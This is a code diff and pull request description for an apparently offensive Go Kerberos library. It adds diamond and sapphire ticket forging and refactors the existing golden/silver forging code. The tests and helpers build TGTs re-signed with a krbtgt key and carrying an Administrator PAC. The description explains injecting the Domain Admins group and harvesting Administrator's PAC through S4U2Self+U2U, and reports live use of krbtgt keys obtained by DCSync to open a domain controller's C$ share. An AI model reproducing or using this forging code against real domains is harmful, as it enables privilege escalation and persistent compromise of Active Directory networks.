+	svcKey := bytes.Repeat([]byte{0x11}, 16)  // service account key (RC4)
+	krbtgt := bytes.Repeat([]byte{0x99}, 32)  // domain krbtgt key (AES256)
+	sessKey := bytes.Repeat([]byte{0x33}, 16) // TGT session key the reply is sealed to (RC4)
+
+	// A genuine privileged PAC, signed as the KDC would (service key as the
+	// "server", here also standing in for the counter-signer).
+	genuineInfo, err := buildLogonInfo(&ForgeOptions{
+		Realm: testRealm, Username: "Administrator", DomainSID: testDomainSID,
+		UserRID: 500, PrimaryGroupRID: 513, GroupRIDs: []uint32{513, 512, 519, 518, 520},
+		LogonDomainName: "CORP", UserAccountControl: defaultUserAccountControl,
+	}, time.Unix(1700000000, 0))
+	if err != nil {
+		t.Fatalf("buildLogonInfo: %v", err)
+	}
+	genuinePACObj, err := pac.Forge(genuineInfo, "Administrator", time.Unix(1700000000, 0), messages.ETypeRC4HMAC)
+	if err != nil {
+		t.Fatalf("pac.Forge: %v", err)
+	}
+	genuinePAC, err := genuinePACObj.Sign(svcKey, svcKey)
+	if err != nil {
+		t.Fatalf("sign genuine PAC: %v", err)
+	}
+
+	// Wrap it in a ticket enc-part encrypted under the TGT session key (usage 2),
+	// mirroring the ENC-TKT-IN-SKEY reply the sapphire harvest decrypts.
+	replyTicket := syntheticTicketWithPAC(t, genuinePAC, "Administrator", testRealm, sessKey, messages.ETypeRC4HMAC)
+
+	// Extract (as harvestPACViaS4USelfU2U does) and assert the PAC came out intact.
+	extracted, cname, crealm, err := extractPACFromTicket(replyTicket, messages.ETypeRC4HMAC, sessKey)
+	if err != nil {
+		t.Fatalf("extractPACFromTicket: %v", err)
+	}
+	if !bytes.Equal(extracted, genuinePAC) {
+		t.Fatal("extracted PAC bytes differ from the genuine PAC (extraction not intact)")
+	}
+	if len(cname.NameString) != 1 || cname.NameString[0] != "Administrator" {
+		t.Errorf("harvested client = %+v, want Administrator", cname)
+	}
+
+	// Graft into a sapphire TGT re-signed with the krbtgt key.
+	sapphire, err := graftPACIntoTGT(extracted, cname, crealm, SapphireOptions{
+		ImpersonateUser: "Administrator",
+		Key:             krbtgt,
+		KeyEType:        messages.ETypeAES256CTSHMACSHA196,
+	})
+	if err != nil {
+		t.Fatalf("graftPACIntoTGT: %v", err)
+	}
+
+	if sapphire.Ticket.SName.NameString[0] != "krbtgt" || sapphire.Ticket.SName.NameString[1] != testRealm {
+		t.Errorf("sapphire SName = %+v, want krbtgt/%s", sapphire.Ticket.SName, testRealm)
+	}
+	enc, pacBytes := extractPAC(t, sapphire.Ticket, krbtgt, messages.ETypeAES256CTSHMACSHA196)
+	if len(enc.CName.NameString) != 1 || enc.CName.NameString[0] != "Administrator" {
+		t.Errorf("sapphire CName = %+v, want Administrator", enc.CName)
+	}
+
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		t.Fatalf("parse grafted PAC: %v", err)
+	}
+	// Re-signed with the krbtgt key (both signatures), not the original service key.
+	if err := p.VerifyServerSignature(krbtgt); err != nil {
+		t.Errorf("grafted PAC server signature (krbtgt): %v", err)
+	}
+	if err := p.VerifyKDCSignature(krbtgt); err != nil {
+		t.Errorf("grafted PAC KDC signature (krbtgt): %v", err)
+	}
+
+	// Every identity field must be the genuine one — nothing fabricated.
+	grafted, err := p.LogonInfo()
+	if err != nil {
+		t.Fatalf("decode grafted PAC logon info: %v", err)
+	}
+	if grafted.UserName() != "Administrator" || grafted.UserRID() != 500 {
+		t.Errorf("grafted identity = %q/%d, want Administrator/500", grafted.UserName(), grafted.UserRID())
+	}
+	if !hasRID(grafted.GroupRIDs(), 512) || !hasRID(grafted.GroupRIDs(), 519) {
+		t.Errorf("grafted PAC lost genuine privileged groups: %v", grafted.GroupRIDs())
+	}
+	if len(grafted.GroupRIDs()) != len(genuineInfo.GroupRIDs()) {
+		t.Errorf("grafted group count = %d, want %d (must be unmodified)", len(grafted.GroupRIDs()), len(genuineInfo.GroupRIDs()))
+	}
+}
+
+// TestSapphireRequestShape checks the harvest TGS-REQ carries the U2U markers:
+// ENC-TKT-IN-SKEY, an additional ticket, and a PA-FOR-USER element.
+func TestSapphireRequestShape(t *testing.T) {
+	c := fakeTGTClient(t)
+	req, err := c.buildSapphireTGSReq("Administrator", "", 4242)
+	if err != nil {
+		t.Fatalf("buildSapphireTGSReq: %v", err)
+	}
+	wire, err := req.Marshal()
+	if err != nil {
+		t.Fatalf("marshal: %v", err)
+	}
+
+	var app asn1.RawValue
+	if _, err := asn1.Unmarshal(wire, &app); err != nil {
+		t.Fatal(err)
+	}
+	bodyElem := seqChild(t, app.Bytes, asn1.ClassContextSpecific, 4)
+
+	optElem := seqChild(t, bodyElem.Bytes, asn1.ClassContextSpecific, 0)
+	var flags asn1.BitString
+	if _, err := asn1.Unmarshal(optElem.Bytes, &flags); err != nil {
+		t.Fatalf("parse KDCOptions: %v", err)
+	}
+	if flags.At(kdcOptionEncTktInSKey) != 1 {
+		t.Errorf("ENC-TKT-IN-SKEY (bit 28) not set; bytes=% X", flags.Bytes)
+	}
+
+	// [11] additional-tickets must be present (the client's own TGT).
+	if !hasContextTag(bodyElem.Bytes, 11) {
+		t.Error("no additional-tickets [11] in sapphire TGS-REQ body")
+	}
+
+	// A PA-FOR-USER PAData element (type 129) must be present.
+	if !hasPAType(t, wire, iana.PAForUser) {
+		t.Error("no PA-FOR-USER element in sapphire TGS-REQ")
+	}
+}
+
+// ── helpers ─────────────────────────────────────────────────────────────────
+
+func hasRID(rids []uint32, want uint32) bool {
+	for _, r := range rids {
+		if r == want {
+			return true
+		}
+	}
+	return false
+}
+
+// syntheticTicketWithPAC builds a ticket whose enc-part (encrypted under key at
+// ticket key usage 2) carries the given PAC for cname@crealm, modeling a
+// KDC-issued reply ticket.
+func syntheticTicketWithPAC(t *testing.T, pacBytes []byte, username, realm string, key []byte, etype int) messages.Ticket {
+	t.Helper()
+	authData, err := wrapPACInAuthData(pacBytes)
+	if err != nil {
+		t.Fatalf("wrapPACInAuthData: %v", err)
+	}
+	enc := messages.EncTicketPart{
+		Flags:             messages.NewKerberosFlags(messages.TicketFlagForwardable),
+		Key:               messages.EncryptionKey{KeyType: etype, KeyValue: key},
+		CRealm:            realm,
+		CName:             messages.PrincipalName{NameType: messages.NameTypePrincipal, NameString: []string{username}},
+		Transited:         messages.TransitedEncoding{TRType: 0, Contents: []byte{}},
+		AuthTime:          time.Unix(1700000000, 0).UTC(),
+		StartTime:         time.Unix(1700000000, 0).UTC(),
+		EndTime:           time.Unix(1700003600, 0).UTC(),
+		RenewTill:         time.Unix(1700007200, 0).UTC(),
+		AuthorizationData: authData,
+	}
+	encBytes, err := enc.Marshal()
+	if err != nil {
+		t.Fatalf("marshal EncTicketPart: %v", err)
+	}
+	cipher, err := kerbcrypto.Encrypt(etype, key, kerbcrypto.KeyUsageKDCRepTicket, encBytes)
+	if err != nil {
+		t.Fatalf("encrypt EncTicketPart: %v", err)
+	}
+	return messages.Ticket{
+		TktVno:  messages.KerberosV5,
+		Realm:   realm,
+		SName:   messages.PrincipalName{NameType: messages.NameTypePrincipal, NameString: []string{username}},
+		EncPart: messages.EncryptedData{EType: etype, Cipher: cipher},
+	}
+}
+
+// hasContextTag reports whether the SEQUENCE (given as its TLV) contains a
+// context-specific element with the given tag.
+func hasContextTag(seqTLV []byte, tag int) bool {
+	var seq asn1.RawValue
+	if _, err := asn1.Unmarshal(seqTLV, &seq); err != nil {
+		return false
+	}
+	rest := seq.Bytes
+	for len(rest) > 0 {
+		var e asn1.RawValue
+		r, err := asn1.Unmarshal(rest, &e)
+		if err != nil {
+			return false
+		}
+		if e.Class == asn1.ClassContextSpecific && e.Tag == tag {
+			return true
+		}
+		rest = r
+	}
+	return false
+}
+
+// hasPAType reports whether the TGS-REQ wire carries a PAData element of padType.
+func hasPAType(t *testing.T, wire []byte, padType int) bool {
+	t.Helper()
+	var req messages.TGSReq
+	if _, err := req.Unmarshal(wire); err != nil {
+		t.Fatalf("re-parse TGS-REQ: %v", err)
+	}
+	for _, pa := range req.PAData {
+		if pa.PADataType == padType {
+			return true
+		}
+	}
+	return false
+}

--- a/network/kerberos/v5/forge.go
+++ b/network/kerberos/v5/forge.go
@@ -30,9 +30,12 @@ import (
 // 2.8). For a golden ticket the "server" is krbtgt, so both signatures use the
 // krbtgt key; for a silver ticket both use the service key (the holder never
 // contacts the KDC, and services do not verify the KDC signature by default).
-// Diamond and sapphire tickets — which re-use a legitimately issued PAC and so
-// require NDR-decoding an existing KERB_VALIDATION_INFO — are intentionally out
-// of scope here and tracked separately.
+//
+// Diamond and sapphire tickets — which re-use a legitimately issued PAC instead
+// of a fully fabricated one — build on the same primitives and live in
+// diamond_sapphire.go: they NDR-decode an existing KERB_VALIDATION_INFO (via the
+// pac package) rather than assembling one from scratch, then re-sign with the
+// helpers here.
 
 // AD-type numbers ([MS-KILE] 3.4.5.3 / RFC 4120 5.2.6) for embedding the PAC.
 const (
@@ -191,34 +194,74 @@ func forge(opts ForgeOptions, sname messages.PrincipalName, srealm string, golde
 		NameString: []string{opts.Username},
 	}
 
-	// Ticket flags: forwardable + renewable + pre-authent (+ initial for a TGT).
-	flagBits := []int{
-		messages.TicketFlagForwardable,
-		messages.TicketFlagRenewable,
-		messages.TicketFlagPreAuthent,
-	}
-	if golden {
-		flagBits = append(flagBits, messages.TicketFlagInitial)
-	}
-	flags := messages.NewKerberosFlags(flagBits...)
-
 	// Build, sign, and embed the PAC.
 	authData, err := buildPACAuthData(&opts, start)
 	if err != nil {
 		return nil, err
 	}
 
+	return assembleForgedTicket(assembleParams{
+		SName:        sname,
+		SRealm:       srealm,
+		CName:        cname,
+		Initial:      golden,
+		AuthData:     authData,
+		Key:          opts.Key,
+		KeyEType:     opts.KeyEType,
+		KvNo:         opts.KvNo,
+		SessionKey:   sessionKey,
+		SessionEType: sessionEType,
+		StartTime:    start,
+		EndTime:      end,
+		RenewTill:    renew,
+	})
+}
+
+// assembleParams gathers the inputs assembleForgedTicket needs to build, encrypt,
+// and package a ticket from an already-built authorization-data (PAC) element.
+type assembleParams struct {
+	SName        messages.PrincipalName
+	SRealm       string
+	CName        messages.PrincipalName
+	Initial      bool // set the initial (AS-issued) ticket flag, i.e. a forged TGT
+	AuthData     []messages.AuthorizationData
+	Key          []byte // service/krbtgt key encrypting the enc-part
+	KeyEType     int
+	KvNo         int
+	SessionKey   []byte
+	SessionEType int
+	StartTime    time.Time
+	EndTime      time.Time
+	RenewTill    time.Time
+}
+
+// assembleForgedTicket builds the EncTicketPart, encrypts it with the supplied
+// key (ticket key usage 2), and returns a ForgedTicket with the matching
+// KrbCredInfo. It is the shared assembly tail for golden/silver forging and for
+// the sapphire graft (which supplies a genuine, re-signed PAC as AuthData).
+func assembleForgedTicket(p assembleParams) (*ForgedTicket, error) {
+	// Ticket flags: forwardable + renewable + pre-authent (+ initial for a TGT).
+	flagBits := []int{
+		messages.TicketFlagForwardable,
+		messages.TicketFlagRenewable,
+		messages.TicketFlagPreAuthent,
+	}
+	if p.Initial {
+		flagBits = append(flagBits, messages.TicketFlagInitial)
+	}
+	flags := messages.NewKerberosFlags(flagBits...)
+
 	encPart := messages.EncTicketPart{
 		Flags:             flags,
-		Key:               messages.EncryptionKey{KeyType: sessionEType, KeyValue: sessionKey},
-		CRealm:            srealm,
-		CName:             cname,
+		Key:               messages.EncryptionKey{KeyType: p.SessionEType, KeyValue: p.SessionKey},
+		CRealm:            p.SRealm,
+		CName:             p.CName,
 		Transited:         messages.TransitedEncoding{TRType: 0, Contents: []byte{}},
-		AuthTime:          start,
-		StartTime:         start,
-		EndTime:           end,
-		RenewTill:         renew,
-		AuthorizationData: authData,
+		AuthTime:          p.StartTime,
+		StartTime:         p.StartTime,
+		EndTime:           p.EndTime,
+		RenewTill:         p.RenewTill,
+		AuthorizationData: p.AuthData,
 	}
 	encBytes, err := encPart.Marshal()
 	if err != nil {
@@ -226,16 +269,16 @@ func forge(opts ForgeOptions, sname messages.PrincipalName, srealm string, golde
 	}
 
 	// Encrypt the enc-part with the service/krbtgt key (ticket key usage 2).
-	cipher, err := kerbcrypto.Encrypt(opts.KeyEType, opts.Key, kerbcrypto.KeyUsageKDCRepTicket, encBytes)
+	cipher, err := kerbcrypto.Encrypt(p.KeyEType, p.Key, kerbcrypto.KeyUsageKDCRepTicket, encBytes)
 	if err != nil {
 		return nil, fmt.Errorf("kerberos: encrypt ticket enc-part: %w", err)
 	}
 
 	ticket := messages.Ticket{
 		TktVno:  messages.KerberosV5,
-		Realm:   srealm,
-		SName:   sname,
-		EncPart: messages.EncryptedData{EType: opts.KeyEType, KvNo: opts.KvNo, Cipher: cipher},
+		Realm:   p.SRealm,
+		SName:   p.SName,
+		EncPart: messages.EncryptedData{EType: p.KeyEType, KvNo: p.KvNo, Cipher: cipher},
 	}
 	ticketRaw, err := ticket.Marshal()
 	if err != nil {
@@ -243,24 +286,24 @@ func forge(opts ForgeOptions, sname messages.PrincipalName, srealm string, golde
 	}
 
 	credInfo := messages.KrbCredInfo{
-		Key:       messages.EncryptionKey{KeyType: sessionEType, KeyValue: sessionKey},
-		PRealm:    srealm,
-		PName:     cname,
+		Key:       messages.EncryptionKey{KeyType: p.SessionEType, KeyValue: p.SessionKey},
+		PRealm:    p.SRealm,
+		PName:     p.CName,
 		Flags:     flags,
-		AuthTime:  start,
-		StartTime: start,
-		EndTime:   end,
-		RenewTill: renew,
-		SRealm:    srealm,
-		SName:     sname,
+		AuthTime:  p.StartTime,
+		StartTime: p.StartTime,
+		EndTime:   p.EndTime,
+		RenewTill: p.RenewTill,
+		SRealm:    p.SRealm,
+		SName:     p.SName,
 	}
 
 	return &ForgedTicket{
 		Ticket:       ticket,
 		TicketRaw:    ticketRaw,
 		CredInfo:     credInfo,
-		SessionKey:   sessionKey,
-		SessionEType: sessionEType,
+		SessionKey:   p.SessionKey,
+		SessionEType: p.SessionEType,
 	}, nil
 }
 
@@ -316,8 +359,14 @@ func buildPACAuthData(opts *ForgeOptions, authTime time.Time) ([]messages.Author
 	if err != nil {
 		return nil, fmt.Errorf("kerberos: sign PAC: %w", err)
 	}
+	return wrapPACInAuthData(pacBytes)
+}
 
-	// AD-WIN2K-PAC element, then wrap in AD-IF-RELEVANT.
+// wrapPACInAuthData wraps a marshaled PAC in the AD-WIN2K-PAC → AD-IF-RELEVANT
+// authorization-data nesting expected in a ticket enc-part ([MS-KILE] 3.4.5.3).
+// It is the inverse of extractWin2KPAC and is shared by golden/silver forging,
+// diamond re-signing, and the sapphire graft.
+func wrapPACInAuthData(pacBytes []byte) ([]messages.AuthorizationData, error) {
 	innerDER, err := asn1.Marshal([]messages.AuthorizationData{
 		{ADType: adTypeWin2KPAC, ADData: pacBytes},
 	})

--- a/network/kerberos/v5/pac/build.go
+++ b/network/kerberos/v5/pac/build.go
@@ -20,9 +20,10 @@ import (
 // ([MS-RPCE] 2.2.6): a top-level pointer to the structure is marshaled under NDR
 // (little-endian) and wrapped in a CommonTypeHeader + PrivateHeaderForConstructed
 // Type, padded to an 8-octet boundary. Only the logon-info and client-info
-// buffers are emitted; diamond/sapphire forging (which re-uses a legitimately
-// issued PAC and therefore needs full NDR decode of an existing buffer) is out of
-// scope here and tracked separately.
+// buffers are emitted here. Diamond/sapphire forging re-uses a legitimately
+// issued PAC and round-trips an existing buffer through
+// UnmarshalKerbValidationInfo → edit → MarshalKerbValidationInfo (see the parent
+// package's diamond_sapphire.go), then re-signs with PAC.Sign.
 
 // filetimeEpochDelta is the number of 100-nanosecond intervals between the
 // Windows FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01).


### PR DESCRIPTION
### Linked Issue
`Closes #999`

### Root Cause
Golden and silver forging fabricate a PAC from scratch, which the issue notes as detectable and which explicitly deferred the two PAC-reuse primitives (`forge.go` / `pac/build.go`). Diamond and sapphire were left unimplemented, so the library had no way to build a ticket around a legitimately issued PAC.

### Fix Description
Adds `KerberosClient.ForgeDiamond` and `KerberosClient.ForgeSapphire` in a new `diamond_sapphire.go`, and replaces the out-of-scope notes.

- **Diamond** decrypts the client's genuine TGT with the krbtgt key (ticket key usage 2), edits the embedded `KERB_VALIDATION_INFO` (`PACModifications`: add group RIDs / ExtraSids / override user or primary-group RID), recomputes the server then KDC signatures ([MS-PAC] 2.8), and re-encrypts with the krbtgt key.
- **Sapphire** harvests a privileged user's genuine PAC via a combined S4U2Self + user-to-user (ENC-TKT-IN-SKEY) exchange (so the reply ticket is sealed to a TGT session key the caller holds), then grafts that real PAC unmodified into a forged TGT re-signed with the krbtgt key.

Both reuse `pac.PAC.Sign` and the `AD-IF-RELEVANT` wrapping, and share a new `assembleForgedTicket` helper factored out of `forge()`. The ticket signature (0x10) and extended-KDC signature (0x13) are dropped on re-sign (keyed over KDC-only inputs, and omitted by golden tickets too). Counted strings in a re-encoded logon-info are normalized so `RPC_UNICODE_STRING.MaximumLength` stays consistent with the NDR conformant `MaximumCount` — a Windows PAC allocates one extra UTF-16 unit that the encoder cannot reproduce and that a KDC rejects as a count mismatch.

### How Verified
- `go build ./...`, `go vet ./network/kerberos/...`, `go test ./network/kerberos/...` all green.
- **Live, against a Windows Server 2016 DC** (realm `TMP-W-2016.LOCAL`), using the krbtgt keys recovered by DCSync (krbtgt AES256 from the supplemental credentials, RC4 NT hash):
  - **Diamond:** obtained a genuine TGT for a disposable low-privilege user (confirmed denied `\\DC\C$` = ACCESS_DENIED), forged a diamond TGT injecting Domain Admins (RID 512), then used it to `GetTGS cifs/…` and open `C$` successfully — admin access reflecting the injected group. A U2U read-back of a KDC-issued service ticket confirmed the injected RID 512 is present in the KDC-processed PAC.
  - **Sapphire:** as the machine account, ran S4U2Self+U2U to pull Administrator's genuine PAC, grafted it into a krbtgt-signed TGT, and authenticated to `C$` as Administrator.
  - The disposable user was deleted afterward; server state restored (verified 0 remaining entries).

### Test Coverage
- **Added** (`diamond_sapphire_test.go`): `TestForgeDiamondInjectsGroupAndResigns`, `TestForgeDiamondNoModsRoundTrips`, `TestForgeSapphireGraftsPACIntact`, `TestSapphireRequestShape`.

### Scope of Change
- **Files changed:** `network/kerberos/v5/diamond_sapphire.go` (new), `network/kerberos/v5/diamond_sapphire_test.go` (new), `network/kerberos/v5/forge.go` (extract `assembleForgedTicket` / `wrapPACInAuthData`, update note), `network/kerberos/v5/pac/build.go` (update note).
- **Submodule pointer updated:** no.
- **Behavioral changes outside the feature:** none (the golden/silver path is refactored to call the shared helper with identical output).

### Risk and Rollout
Additive: new exported methods plus an internal refactor of the golden/silver assembly tail whose output is unchanged (existing forge tests pass). Safe to merge.